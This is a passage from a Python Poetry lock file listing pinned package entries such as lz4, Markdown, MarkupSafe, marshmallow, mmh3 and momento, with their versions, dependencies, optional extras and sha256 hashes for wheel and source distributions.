"lz4-4.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:83903fe6db92db0be101acedc677aa41a490b561567fe1b3fe68695b2110326c"}, {file = "lz4-4.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:926b26db87ec8822cf1870efc3d04d06062730ec3279bbbd33ba47a6c0a5c673"}, {file = "lz4-4.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e05afefc4529e97c08e65ef92432e5f5225c0bb21ad89dee1e06a882f91d7f5e"}, {file = "lz4-4.3.2-cp38-cp38-win32.whl", hash = "sha256:ad38dc6a7eea6f6b8b642aaa0683253288b0460b70cab3216838747163fb774d"}, {file = "lz4-4.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:7e2dc1bd88b60fa09b9b37f08553f45dc2b770c52a5996ea52b2b40f25445676"}, {file = "lz4-4.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:edda4fb109439b7f3f58ed6bede59694bc631c4b69c041112b1b7dc727fffb23"}, {file = "lz4-4.3.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:0ca83a623c449295bafad745dcd399cea4c55b16b13ed8cfea30963b004016c9"}, {file = "lz4-4.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d5ea0e788dc7e2311989b78cae7accf75a580827b4d96bbaf06c7e5a03989bd5"}, {file = "lz4-4.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a98b61e504fb69f99117b188e60b71e3c94469295571492a6468c1acd63c37ba"}, {file = "lz4-4.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4931ab28a0d1c133104613e74eec1b8bb1f52403faabe4f47f93008785c0b929"}, {file = "lz4-4.3.2-cp39-cp39-win32.whl", hash = "sha256:ec6755cacf83f0c5588d28abb40a1ac1643f2ff2115481089264c7630236618a"}, {file = "lz4-4.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:4caedeb19e3ede6c7a178968b800f910db6503cb4cb1e9cc9221157572139b49"}, {file = "lz4-4.3.2.tar.gz", hash = "sha256:e1431d84a9cfb23e6773e72078ce8e65cad6745816d4cbf9ae67da5ea419acda"}, ] [package.extras] docs = ["sphinx (>=1.6.0)", "sphinx-bootstrap-theme"] flake8 = ["flake8"] tests = ["psutil", "pytest (!=3.3.0)", "pytest-cov"] [[package]] name = "manifest-ml" version = "0.0.1" description = "Manifest for Prompt Programming Foundation Models." 
optional = true python-versions = ">=3.8.0" files = [ {file = "manifest-ml-0.0.1.tar.gz", hash = "sha256:f828faf7de41fad5318254beec08acdf5142196e0e22203a4047412c2d3127a0"}, {file = "manifest_ml-0.0.1-py2.py3-none-any.whl", hash = "sha256:fc4e62e706fd767fd8851d91051fdb71bc79b2df9c66f5879736c46d8163a316"}, ] [package.dependencies] dill = ">=0.3.5" redis = ">=4.3.1" requests = ">=2.27.1" sqlitedict = ">=2.0.0" tqdm = ">=4.64.0" [package.extras] all = ["Flask (>=2.1.2)", "accelerate (>=0.10.0)", "autopep8 (>=1.6.0)", "black (>=22.3.0)", "docformatter (>=1.4)", "flake8 (>=4.0.0)", "flake8-docstrings (>=1.6.0)", "isort (>=5.9.3)", "mypy (>=0.950)", "nbsphinx (>=0.8.0)", "pep8-naming (>=0.12.1)", "pre-commit (>=2.14.0)", "pytest (>=7.0.0)", "pytest-cov (>=3.0.0)", "python-dotenv (>=0.20.0)", "recommonmark (>=0.7.1)", "sphinx-autobuild", "sphinx-rtd-theme (>=0.5.1)", "torch (>=1.8.0)", "transformers (>=4.20.0)", "twine", "types-PyYAML (>=6.0.7)", "types-protobuf (>=3.19.21)", "types-python-dateutil (>=2.8.16)", "types-redis (>=4.2.6)", "types-requests (>=2.27.29)", "types-setuptools (>=57.4.17)"] api = ["Flask (>=2.1.2)", "accelerate (>=0.10.0)", "torch (>=1.8.0)", "transformers (>=4.20.0)"] dev = ["autopep8 (>=1.6.0)", "black (>=22.3.0)", "docformatter (>=1.4)", "flake8 (>=4.0.0)", "flake8-docstrings (>=1.6.0)", "isort (>=5.9.3)", "mypy (>=0.950)", "nbsphinx (>=0.8.0)", "pep8-naming (>=0.12.1)", "pre-commit (>=2.14.0)", "pytest (>=7.0.0)", "pytest-cov (>=3.0.0)", "python-dotenv (>=0.20.0)", "recommonmark (>=0.7.1)", "sphinx-autobuild", "sphinx-rtd-theme (>=0.5.1)", "twine", "types-PyYAML (>=6.0.7)", "types-protobuf (>=3.19.21)", "types-python-dateutil (>=2.8.16)", "types-redis (>=4.2.6)", "types-requests (>=2.27.29)", "types-setuptools (>=57.4.17)"] [[package]] name = "markdown" version = "3.5" description = "Python implementation of John Gruber's Markdown." optional = true python-versions = ">=3.8" files = [ {file = "Markdown-3.5-py3-none-any.whl", hash = "sha256:4afb124395ce5fc34e6d9886dab977fd9ae987fc6e85689f08278cf0c69d4bf3"}, {file = "Markdown-3.5.tar.gz", hash = "sha256:a807eb2e4778d9156c8f07876c6e4d50b5494c5665c4834f67b06459dfd877b3"}, ] [package.extras] docs = ["mdx-gh-links (>=0.2)", "mkdocs (>=1.5)", "mkdocs-gen-files", "mkdocs-literate-nav", "mkdocs-nature (>=0.6)", "mkdocs-section-index", "mkdocstrings[python]"] testing = ["coverage", "pyyaml"] [[package]] name = "markdown-it-py" version = "3.0.0" description = "Python port of markdown-it. Markdown parsing, done right!" optional = true python-versions = ">=3.8" files = [ {file = "markdown-it-py-3.0.0.tar.gz", hash = "sha256:e3f60a94fa066dc52ec76661e37c851cb232d92f9886b15cb560aaada2df8feb"}, {file = "markdown_it_py-3.0.0-py3-none-any.whl", hash = "sha256:355216845c60bd96232cd8d8c40e8f9765cc86f46880e43a8fd22dc1a1a8cab1"}, ] [package.dependencies] mdurl = ">=0.1,<1.0" [package.extras] benchmarking = ["psutil", "pytest", "pytest-benchmark"] code-style = ["pre-commit (>=3.0,<4.0)"] compare = ["commonmark (>=0.9,<1.0)", "markdown (>=3.4,<4.0)", "mistletoe (>=1.0,<2.0)", "mistune (>=2.0,<3.0)", "panflute (>=2.3,<3.0)"] linkify = ["linkify-it-py (>=1,<3)"] plugins = ["mdit-py-plugins"] profiling = ["gprof2dot"] rtd = ["jupyter_sphinx", "mdit-py-plugins", "myst-parser", "pyyaml", "sphinx", "sphinx-copybutton", "sphinx-design", "sphinx_book_theme"] testing = ["coverage", "pytest", "pytest-cov", "pytest-regressions"] [[package]] name = "markdownify" version = "0.11.6" description = "Convert HTML to markdown." 
optional = true python-versions = "*" files = [ {file = "markdownify-0.11.6-py3-none-any.whl", hash = "sha256:ba35fe289d5e9073bcd7d2cad629278fe25f1a93741fcdc0bfb4f009076d8324"}, {file = "markdownify-0.11.6.tar.gz", hash = "sha256:009b240e0c9f4c8eaf1d085625dcd4011e12f0f8cec55dedf9ea6f7655e49bfe"}, ] [package.dependencies] beautifulsoup4 = ">=4.9,<5" six = ">=1.15,<2" [[package]] name = "markupsafe" version = "2.1.3" description = "Safely add untrusted strings to HTML/XML markup." optional = false python-versions = ">=3.7" files = [ {file = "MarkupSafe-2.1.3-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:cd0f502fe016460680cd20aaa5a76d241d6f35a1c3350c474bac1273803893fa"}, {file = "MarkupSafe-2.1.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e09031c87a1e51556fdcb46e5bd4f59dfb743061cf93c4d6831bf894f125eb57"}, {file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:68e78619a61ecf91e76aa3e6e8e33fc4894a2bebe93410754bd28fce0a8a4f9f"}, {file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:65c1a9bcdadc6c28eecee2c119465aebff8f7a584dd719facdd9e825ec61ab52"}, {file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:525808b8019e36eb524b8c68acdd63a37e75714eac50e988180b169d64480a00"}, {file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:962f82a3086483f5e5f64dbad880d31038b698494799b097bc59c2edf392fce6"}, {file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:aa7bd130efab1c280bed0f45501b7c8795f9fdbeb02e965371bbef3523627779"}, {file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c9c804664ebe8f83a211cace637506669e7890fec1b4195b505c214e50dd4eb7"}, {file = "MarkupSafe-2.1.3-cp310-cp310-win32.whl", hash = "sha256:10bbfe99883db80bdbaff2dcf681dfc6533a614f700da1287707e8a5d78a8431"}, {file = "MarkupSafe-2.1.3-cp310-cp310-win_amd64.whl", hash = "sha256:1577735524cdad32f9f694208aa75e422adba74f1baee7551620e43a3141f559"}, {file = "MarkupSafe-2.1.3-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ad9e82fb8f09ade1c3e1b996a6337afac2b8b9e365f926f5a61aacc71adc5b3c"}, {file = "MarkupSafe-2.1.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:3c0fae6c3be832a0a0473ac912810b2877c8cb9d76ca48de1ed31e1c68386575"}, {file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b076b6226fb84157e3f7c971a47ff3a679d837cf338547532ab866c57930dbee"}, {file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bfce63a9e7834b12b87c64d6b155fdd9b3b96191b6bd334bf37db7ff1fe457f2"}, {file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:338ae27d6b8745585f87218a3f23f1512dbf52c26c28e322dbe54bcede54ccb9"}, {file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e4dd52d80b8c83fdce44e12478ad2e85c64ea965e75d66dbeafb0a3e77308fcc"}, {file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:df0be2b576a7abbf737b1575f048c23fb1d769f267ec4358296f31c2479db8f9"}, {file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:5bbe06f8eeafd38e5d0a4894ffec89378b6c6a625ff57e3028921f8ff59318ac"}, {file = "MarkupSafe-2.1.3-cp311-cp311-win32.whl", hash = "sha256:dd15ff04ffd7e05ffcb7fe79f1b98041b8ea30ae9234aed2a9168b5797c3effb"}, {file = 
"MarkupSafe-2.1.3-cp311-cp311-win_amd64.whl", hash = "sha256:134da1eca9ec0ae528110ccc9e48041e0828d79f24121a1a146161103c76e686"}, {file = "MarkupSafe-2.1.3-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:f698de3fd0c4e6972b92290a45bd9b1536bffe8c6759c62471efaa8acb4c37bc"}, {file = "MarkupSafe-2.1.3-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:aa57bd9cf8ae831a362185ee444e15a93ecb2e344c8e52e4d721ea3ab6ef1823"}, {file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ffcc3f7c66b5f5b7931a5aa68fc9cecc51e685ef90282f4a82f0f5e9b704ad11"}, {file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:47d4f1c5f80fc62fdd7777d0d40a2e9dda0a05883ab11374334f6c4de38adffd"}, {file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1f67c7038d560d92149c060157d623c542173016c4babc0c1913cca0564b9939"}, {file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:9aad3c1755095ce347e26488214ef77e0485a3c34a50c5a5e2471dff60b9dd9c"}, {file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:14ff806850827afd6b07a5f32bd917fb7f45b046ba40c57abdb636674a8b559c"}, {file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8f9293864fe09b8149f0cc42ce56e3f0e54de883a9de90cd427f191c346eb2e1"}, {file = "MarkupSafe-2.1.3-cp312-cp312-win32.whl", hash = "sha256:715d3562f79d540f251b99ebd6d8baa547118974341db04f5ad06d5ea3eb8007"}, {file = "MarkupSafe-2.1.3-cp312-cp312-win_amd64.whl", hash = "sha256:1b8dd8c3fd14349433c79fa8abeb573a55fc0fdd769133baac1f5e07abf54aeb"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:8e254ae696c88d98da6555f5ace2279cf7cd5b3f52be2b5cf97feafe883b58d2"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cb0932dc158471523c9637e807d9bfb93e06a95cbf010f1a38b98623b929ef2b"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9402b03f1a1b4dc4c19845e5c749e3ab82d5078d16a2a4c2cd2df62d57bb0707"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ca379055a47383d02a5400cb0d110cef0a776fc644cda797db0c5696cfd7e18e"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:b7ff0f54cb4ff66dd38bebd335a38e2c22c41a8ee45aa608efc890ac3e3931bc"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:c011a4149cfbcf9f03994ec2edffcb8b1dc2d2aede7ca243746df97a5d41ce48"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:56d9f2ecac662ca1611d183feb03a3fa4406469dafe241673d521dd5ae92a155"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-win32.whl", hash = "sha256:8758846a7e80910096950b67071243da3e5a20ed2546e6392603c096778d48e0"}, {file = "MarkupSafe-2.1.3-cp37-cp37m-win_amd64.whl", hash = "sha256:787003c0ddb00500e49a10f2844fac87aa6ce977b90b0feaaf9de23c22508b24"}, {file = "MarkupSafe-2.1.3-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:2ef12179d3a291be237280175b542c07a36e7f60718296278d8593d21ca937d4"}, {file = "MarkupSafe-2.1.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2c1b19b3aaacc6e57b7e25710ff571c24d6c3613a45e905b1fde04d691b98ee0"}, {file = "MarkupSafe-2.1.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8afafd99945ead6e075b973fefa56379c5b5c53fd8937dad92c662da5d8fd5ee"}, {file = 
"MarkupSafe-2.1.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8c41976a29d078bb235fea9b2ecd3da465df42a562910f9022f1a03107bd02be"}, {file = "MarkupSafe-2.1.3-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d080e0a5eb2529460b30190fcfcc4199bd7f827663f858a226a81bc27beaa97e"}, {file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:69c0f17e9f5a7afdf2cc9fb2d1ce6aabdb3bafb7f38017c0b77862bcec2bbad8"}, {file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:504b320cd4b7eff6f968eddf81127112db685e81f7e36e75f9f84f0df46041c3"}, {file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:42de32b22b6b804f42c5d98be4f7e5e977ecdd9ee9b660fda1a3edf03b11792d"}, {file = "MarkupSafe-2.1.3-cp38-cp38-win32.whl", hash = "sha256:ceb01949af7121f9fc39f7d27f91be8546f3fb112c608bc4029aef0bab86a2a5"}, {file = "MarkupSafe-2.1.3-cp38-cp38-win_amd64.whl", hash = "sha256:1b40069d487e7edb2676d3fbdb2b0829ffa2cd63a2ec26c4938b2d34391b4ecc"}, {file = "MarkupSafe-2.1.3-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8023faf4e01efadfa183e863fefde0046de576c6f14659e8782065bcece22198"}, {file = "MarkupSafe-2.1.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6b2b56950d93e41f33b4223ead100ea0fe11f8e6ee5f641eb753ce4b77a7042b"}, {file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9dcdfd0eaf283af041973bff14a2e143b8bd64e069f4c383416ecd79a81aab58"}, {file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:05fb21170423db021895e1ea1e1f3ab3adb85d1c2333cbc2310f2a26bc77272e"}, {file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:282c2cb35b5b673bbcadb33a585408104df04f14b2d9b01d4c345a3b92861c2c"}, {file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ab4a0df41e7c16a1392727727e7998a467472d0ad65f3ad5e6e765015df08636"}, {file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:7ef3cb2ebbf91e330e3bb937efada0edd9003683db6b57bb108c4001f37a02ea"}, {file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:0a4e4a1aff6c7ac4cd55792abf96c915634c2b97e3cc1c7129578aa68ebd754e"}, {file = "MarkupSafe-2.1.3-cp39-cp39-win32.whl", hash = "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2"}, {file = "MarkupSafe-2.1.3-cp39-cp39-win_amd64.whl", hash = "sha256:3fd4abcb888d15a94f32b75d8fd18ee162ca0c064f35b11134be77050296d6ba"}, {file = "MarkupSafe-2.1.3.tar.gz", hash = "sha256:af598ed32d6ae86f1b747b82783958b1a4ab8f617b06fe68795c7f026abbdcad"}, ] [[package]] name = "marqo" version = "1.3.1" description = "Tensor search for humans" optional = true python-versions = ">=3" files = [ {file = "marqo-1.3.1-py3-none-any.whl", hash = "sha256:32b1eb95dcd53027277b5f9704bb4a1db29f0c113b487df56dfdc63ef5805f47"}, {file = "marqo-1.3.1.tar.gz", hash = "sha256:d2bab35df93ee7790d10dac459620dcd1133332d0a693046d0aebf17994cf8ac"}, ] [package.dependencies] packaging = "*" pydantic = "<2.0.0" requests = "*" typing-extensions = ">=4.5.0" urllib3 = "*" [[package]] name = "marshmallow" version = "3.20.1" description = "A lightweight library for converting complex datatypes to and from native Python datatypes." 
optional = false python-versions = ">=3.8" files = [ {file = "marshmallow-3.20.1-py3-none-any.whl", hash = "sha256:684939db93e80ad3561392f47be0230743131560a41c5110684c16e21ade0a5c"}, {file = "marshmallow-3.20.1.tar.gz", hash = "sha256:5d2371bbe42000f2b3fb5eaa065224df7d8f8597bc19a1bbfa5bfe7fba8da889"}, ] [package.dependencies] packaging = ">=17.0" [package.extras] dev = ["flake8 (==6.0.0)", "flake8-bugbear (==23.7.10)", "mypy (==1.4.1)", "pre-commit (>=2.4,<4.0)", "pytest", "pytz", "simplejson", "tox"] docs = ["alabaster (==0.7.13)", "autodocsumm (==0.2.11)", "sphinx (==7.0.1)", "sphinx-issues (==3.0.1)", "sphinx-version-warning (==1.1.2)"] lint = ["flake8 (==6.0.0)", "flake8-bugbear (==23.7.10)", "mypy (==1.4.1)", "pre-commit (>=2.4,<4.0)"] tests = ["pytest", "pytz", "simplejson"] [[package]] name = "matplotlib-inline" version = "0.1.6" description = "Inline Matplotlib backend for Jupyter" optional = false python-versions = ">=3.5" files = [ {file = "matplotlib-inline-0.1.6.tar.gz", hash = "sha256:f887e5f10ba98e8d2b150ddcf4702c1e5f8b3a20005eb0f74bfdbd360ee6f304"}, {file = "matplotlib_inline-0.1.6-py3-none-any.whl", hash = "sha256:f1f41aab5328aa5aaea9b16d083b128102f8712542f819fe7e6a420ff581b311"}, ] [package.dependencies] traitlets = "*" [[package]] name = "mdurl" version = "0.1.2" description = "Markdown URL utilities" optional = true python-versions = ">=3.7" files = [ {file = "mdurl-0.1.2-py3-none-any.whl", hash = "sha256:84008a41e51615a49fc9966191ff91509e3c40b939176e643fd50a5c2196b8f8"}, {file = "mdurl-0.1.2.tar.gz", hash = "sha256:bb413d29f5eea38f31dd4754dd7377d4465116fb207585f97bf925588687c1ba"}, ] [[package]] name = "mistune" version = "3.0.2" description = "A sane and fast Markdown parser with useful plugins and renderers" optional = false python-versions = ">=3.7" files = [ {file = "mistune-3.0.2-py3-none-any.whl", hash = "sha256:71481854c30fdbc938963d3605b72501f5c10a9320ecd412c121c163a1c7d205"}, {file = "mistune-3.0.2.tar.gz", hash = "sha256:fc7f93ded930c92394ef2cb6f04a8aabab4117a91449e72dcc8dfa646a508be8"}, ] [[package]] name = "mmh3" version = "3.1.0" description = "Python wrapper for MurmurHash (MurmurHash3), a set of fast and robust hash functions." 
optional = true python-versions = "*" files = [ {file = "mmh3-3.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:16ee043b1bac040b4324b8baee39df9fdca480a560a6d74f2eef66a5009a234e"}, {file = "mmh3-3.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:04ac865319e5b36148a4b6cdf27f8bda091c47c4ab7b355d7f353dfc2b8a3cce"}, {file = "mmh3-3.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9e751f5433417a21c2060b0efa1afc67cfbe29977c867336148c8edb086fae70"}, {file = "mmh3-3.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bdb863b89c1b34e3681d4a3b15d424734940eb8036f3457cb35ef34fb87a503c"}, {file = "mmh3-3.1.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1230930fbf2faec4ddf5b76d0768ae73c102de173c301962bdd468177275adf9"}, {file = "mmh3-3.1.0-cp310-cp310-win32.whl", hash = "sha256:b8ed7a2361718795a1b519a08d05f44947a20b27e202b53946561a00dde669c1"}, {file = "mmh3-3.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:29e878e7467a000f34ab68c218ad7ad81312c0a94bc10df3c50a48bcad39dd83"}, {file = "mmh3-3.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c271472325b70d64a4fbb1f2e964ca5b093ac10258e1390f8408890b065868fe"}, {file = "mmh3-3.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:0109320f7e0e262123ff4f1acd06acfbc8b3bf19cc13d98c0bc369264430aaeb"}, {file = "mmh3-3.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:524e29dfe66499695f9496edcfc96782d130aabd6ba12c50c72372163cc6f3ea"}, {file = "mmh3-3.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:66bdb06a03074e65e614da1aa199b1d16c90608bec9d8fc3faa81d887ffe93cc"}, {file = "mmh3-3.1.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2a4d471eb75df8320061ab3b8cbe11c970be9f116b01bc2222ebda9c0a777520"}, {file = "mmh3-3.1.0-cp311-cp311-win32.whl", hash = "sha256:a886d9ce995a4bdfd7a600ddf61b9015cccbc73c50b898f8ff3c78af24384710"}, {file = "mmh3-3.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:5edb5ac882c04aff8a2a18ae8b74a0c339ac9b83db9820d8456f518bb558e0d8"}, {file = "mmh3-3.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:190fd10981fbd6c67e10ce3b56bcc021562c0df0fee2e2864347d64e65b1783a"}, {file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cd781b115cf649811cfde76368c33d2e553b6f88bb41131c314f30d8e65e9d24"}, {file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f48bb0a867077acc1f548591ad49506389f36d18f36dccd10becf071e5cbdda4"}, {file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d0936a82438e340636a11b9a938378870fc1c7a139632dac09a9a9277351704"}, {file = "mmh3-3.1.0-cp37-cp37m-win32.whl", hash = "sha256:d196cc035c2238493248522ae4e54c3cb790549b1564f6dea4d88dfe4b326313"}, {file = "mmh3-3.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:731d37f089b6c212fab1beea24e673161146eb6c76baf9ac074a3424d1172d41"}, {file = "mmh3-3.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9977fb81f8c66f4eee8439734a18dba7826fe78723d15ab53f42db977005be0f"}, {file = "mmh3-3.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:bf4f3f20a8b8405c08b13bc9e4ac33bf55129b50b535cd07ce1891b7f96326ac"}, {file = 
"mmh3-3.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87cdbc6e70099ad92f17a28b4054ffb1938657e8fb7c1e4e03b194a1b4683fd6"}, {file = "mmh3-3.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6dd81321d14f62aa3711f30533c85a74dc7596e0fee63c8eddd375bc92ab846c"}, {file = "mmh3-3.1.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2e6eba88e5c1a2778f3de00a9502e3c214ebb757337ece2a7d71e060d188ddfa"}, {file = "mmh3-3.1.0-cp38-cp38-win32.whl", hash = "sha256:d91e696925f208d28f3bb7bdf29815524ce955248276af256519bd3538c411ce"}, {file = "mmh3-3.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:cbc2917df568aeb86ec5aa863bfb20fa14e01039cbdce7650efbabc30960df49"}, {file = "mmh3-3.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3b22832d565128be83d69f5d49243bb567840a954df377c9f5b26646a6eec39b"}, {file = "mmh3-3.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ced92a0e285a9111413541c197b0c17d280cee96f7c564b258caf5de5ab8ee01"}, {file = "mmh3-3.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f906833753b4ddcb690c2c1b74e77725868bc3a8b762b7a77737d08be89ae41d"}, {file = "mmh3-3.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:72b5685832a7a87a55ebff481794bc410484d7bd4c5e80dae4d8ac50739138ef"}, {file = "mmh3-3.1.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8d2aa4d422c7c088bbc5d367b45431268ebe6742a0a64eade93fab708e25757c"}, {file = "mmh3-3.1.0-cp39-cp39-win32.whl", hash = "sha256:4459bec818f534dc8378568ad89ab310ff47cda3e00ab322edce48dd899bba32"}, {file = "mmh3-3.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:03e04b3480e71828f48d17653451a3286555f0534942cb6ba93065b10ad5f9dc"}, {file = "mmh3-3.1.0.tar.gz", hash = "sha256:9b0f2b2ab4a915333c9d1089572e290a021ebb5b900bb7f7114dccc03995d732"}, ] [[package]] name = "momento" version = "1.12.0" description = "SDK for Momento" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "momento-1.12.0-py3-none-any.whl", hash = "sha256:1dcb3ebadba67bc5e49337c433119d3857ff2e1e36627a8fcdadcc5db9a2f785"}, {file = "momento-1.12.0.tar.gz", hash = "sha256:31918c4e56b8db2f632a465c3a7df656666b8dab9efdcd49c61f3451d7bc481d"}, ] [package.dependencies] grpcio = ">=1.46.0,<2.0.0" momento-wire-types = ">=0.86.0,<0.87.0" pyjwt = ">=2.4.0,<3.0.0" [[package]] name = "momento-wire-types" version = "0.86.0" description = "Momento Client Proto Generated Files" optional = true python-versions = ">=3.7,<4.0" files = [ {file = 